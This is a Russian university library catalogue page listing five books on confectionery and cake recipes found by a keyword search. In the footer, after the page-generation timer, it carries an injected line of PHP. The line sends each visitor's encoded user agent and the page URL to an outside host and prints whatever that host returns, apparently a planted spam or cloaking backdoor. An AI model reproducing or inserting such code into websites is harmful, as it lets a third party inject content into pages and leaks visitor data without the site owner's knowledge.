Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

109 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=КЕКСЫ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 5
1. 
Табаторович, Александр Николаевич. Товароведение однородных групп продовольственных товаров (зерномучные и кондитерские товары) [Текст] / А. Н. Табаторович ; дар. А. Н. Табаторович, 2017. - 183 с.
Ключевые слова 
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебном пособии рассмотрены вопросы терминологии, классификации, пищевой ценности, формирования и оценки качества основных видов и разновидностей зерномучных и кондитерских товаров. Классификация ассортимента, показатели качества и безопасности представлены в соответствии с действующими нормативными документами и Техническими регламентами Таможенного союза.

Пособие предназначено для студентов, обучающихся по направлениям подготовки 38.03.07 "Товароведение" и 38.03.06 "Торговое дело". Может быть полезно для товароведов-экспертов, коммерсантов и других практических работников, чья деятельность связана с производством, продажей и хранением указанных групп товаров.

Полный текст
2. 
Рецептуры на торты, пирожные, кексы и рулеты. Ч. 3. Пирожные, кексы, рулеты, полуфабрикаты [Текст] : сборник / М-во пищевой промышленности СССР, Управленик кондитерской и крахмало-паточной промышленности, Всесоюзный научно-исследовательский ин-т кондитерской промышленности, 1979. - 768 с.
Держатели документа (Информация об экземплярах) 
3. 
Сборник рецептур на торты, пирожные, кексы, рулеты, печенье, пряники, коврижки и сдобные булочные изделия. Ч. 3 [Текст] : Сб. технолог. нормативов / М-во торговли Рос. Федерации, 2000. - 720 с.
Держатели документа (Информация об экземплярах) 
4. 
Рыжакова, Алла Владимировна. Товароведение и экспертиза кондитерских товаров [Текст] : Учебник гриф-УМО / А. В. Рыжакова, 2005. - 224 с.

Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".

5. 
Торты, пирожные, кексы, кремы [Текст] : рецепты кондитера / сост. Е. Синтюрев, 1991. - 34 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2999 - 26.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.69 с.12 запросов, 0.47c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;